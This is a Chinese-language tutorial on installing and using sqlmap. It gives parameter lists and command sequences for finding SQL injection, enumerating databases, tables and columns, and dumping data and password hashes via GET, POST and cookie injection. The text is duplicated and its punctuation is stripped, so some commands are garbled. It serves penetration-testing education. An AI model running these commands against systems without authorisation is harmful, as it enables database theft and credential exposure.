SQLMAP的安装SQLMAP的官方网站https://sqlmap.org/下载解压缩之后进入sqlmap的文件夹在此文件夹中打开控制台 可以在上方地址栏输入cmd回车快速打开 输入命令python sqlmap.py或python sqlmap.py -h检验是否成功sqlmap使用SQLMAP是一种开源渗透测试工具可自动执行SQL注入缺陷的检测和注入过程并接管数据库服务器。它有强大的检测引擎针对不同类 型的数据库提供多样的渗透测试功能选项实现数据库识别、数据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令以及从数据库指纹识别、从数据库获取数据、 通过带外连接在操作系统上执行命令。支持的注入方式分别是联合查询、报错注入、堆叠注入、布尔盲注、时间盲注使用条件知道网站的绝对路径高权限数据库用户secure_file_priv无限制ctrlC停止现在的探测sqlmap基本参数-d 指定直接数据库连接得连接字符串直接连接到数据库。 -u 指定URL目标 -I 从Burp或WebScarab代理得日志中解析目标 -m 扫描文本文件中给出得多个目标批量扫描 -r 从文本中加载HTTP请求。 用 * 标记注入位置 -g 将Google Dork得结果作为目标URLh -b -- 获取数据库版本信息 -f -- 获取数据库指纹 -a 获取所有信息 -current-user 获取DBMS当前用户 --current-db 获取DBMS当前数据库 --hostname 获取DBMS当前主机名 --is-dba 检测当前用户是否为管理员用户 --users 查询DBMS用户 --passwords 查询DBMS用户密码hash --dbs 查询DBMS数据库 --tables 查询DBMS数据库中得表 --columns 查询DBMS数据库表得列名 --dump 查询转储DBMS数据库表 --dump-all 转储DBMS所有数据库表 -D db_name 指定要求枚举的DBMS数据库名 -T table_name 指定要枚举得DBMS表 -C column_name 指定要枚举得DBMS列 --batch 从不询问用户输入使用所有默认配置 --tamper -- 指定脚本 --dbms -- 指定数据库类型 --os -- 指定操作系统(windows/linux) --level -- 指定探测等级(1~5) --delay -- 设置延时 --technique -- 指定注入方式 --hostname 获取服务器主机名。 --search 搜索数据库中是否存在指定库/表/字段需要指定库名/表名/字段名如果有pytnon 2和3命令写python3 sqlmap.py判断是否存在注入python sqlmap.py -u URL/?id1判断当前用户是否为dbapython sqlmap.py -u URL/?id1 --is-dba查看数据库用户python sqlmap.py -u URL/?id1 --current-user查看所有数据库python sqlmap.py -u URL/?id1 --dbs查看当前数据库名称python sqlmap.py -u URL/?id1 --current-db查询当前数据库的表python sqlmap.py -u URL/?id1 -D 数据库名 --tables查询表中的字段名python sqlmap.py -u URL/?id1 -D 数据库名 -T 表名 --columns查询字段下的数据python sqlmap.py -u URL/?id1 -D 数据库名 -T 表名 --dump针对不同的注入位置GET请求注入sqlmap -u URL/?id1POST请求注入python sqlmap.py -u URL/?id1--dataunameadminpasswdadminsubmitSubmit --dbs--data unametestpasswdtestsubmitSubmit -p uname,passwd --dbs --users --batchCOOKIE注入sqlmap -u xxx/index.php --cookie unameadmin --level 2 --dbs
SQLMAP的安装和使用
SQLMAP的安装SQLMAP的官方网站https://sqlmap.org/下载解压缩之后进入sqlmap的文件夹在此文件夹中打开控制台 可以在上方地址栏输入cmd回车快速打开 输入命令python sqlmap.py或python sqlmap.py -h检验是否成功sqlmap使用SQLMAP是一种开源渗透测试工具可自动执行SQL注入缺陷的检测和注入过程并接管数据库服务器。它有强大的检测引擎针对不同类 型的数据库提供多样的渗透测试功能选项实现数据库识别、数据获取、访问DBMS\操作系统甚至通过带外数据连接的方式执行操作系统的命令以及从数据库指纹识别、从数据库获取数据、 通过带外连接在操作系统上执行命令。支持的注入方式分别是联合查询、报错注入、堆叠注入、布尔盲注、时间盲注使用条件知道网站的绝对路径高权限数据库用户secure_file_priv无限制ctrlC停止现在的探测sqlmap基本参数-d 指定直接数据库连接得连接字符串直接连接到数据库。 -u 指定URL目标 -I 从Burp或WebScarab代理得日志中解析目标 -m 扫描文本文件中给出得多个目标批量扫描 -r 从文本中加载HTTP请求。 用 * 标记注入位置 -g 将Google Dork得结果作为目标URLh -b -- 获取数据库版本信息 -f -- 获取数据库指纹 -a 获取所有信息 -current-user 获取DBMS当前用户 --current-db 获取DBMS当前数据库 --hostname 获取DBMS当前主机名 --is-dba 检测当前用户是否为管理员用户 --users 查询DBMS用户 --passwords 查询DBMS用户密码hash --dbs 查询DBMS数据库 --tables 查询DBMS数据库中得表 --columns 查询DBMS数据库表得列名 --dump 查询转储DBMS数据库表 --dump-all 转储DBMS所有数据库表 -D db_name 指定要求枚举的DBMS数据库名 -T table_name 指定要枚举得DBMS表 -C column_name 指定要枚举得DBMS列 --batch 从不询问用户输入使用所有默认配置 --tamper -- 指定脚本 --dbms -- 指定数据库类型 --os -- 指定操作系统(windows/linux) --level -- 指定探测等级(1~5) --delay -- 设置延时 --technique -- 指定注入方式 --hostname 获取服务器主机名。 --search 搜索数据库中是否存在指定库/表/字段需要指定库名/表名/字段名如果有pytnon 2和3命令写python3 sqlmap.py判断是否存在注入python sqlmap.py -u URL/?id1判断当前用户是否为dbapython sqlmap.py -u URL/?id1 --is-dba查看数据库用户python sqlmap.py -u URL/?id1 --current-user查看所有数据库python sqlmap.py -u URL/?id1 --dbs查看当前数据库名称python sqlmap.py -u URL/?id1 --current-db查询当前数据库的表python sqlmap.py -u URL/?id1 -D 数据库名 --tables查询表中的字段名python sqlmap.py -u URL/?id1 -D 数据库名 -T 表名 --columns查询字段下的数据python sqlmap.py -u URL/?id1 -D 数据库名 -T 表名 --dump针对不同的注入位置GET请求注入sqlmap -u URL/?id1POST请求注入python sqlmap.py -u URL/?id1--dataunameadminpasswdadminsubmitSubmit --dbs--data unametestpasswdtestsubmitSubmit -p uname,passwd --dbs --users --batchCOOKIE注入sqlmap -u xxx/index.php --cookie unameadmin --level 2 --dbs
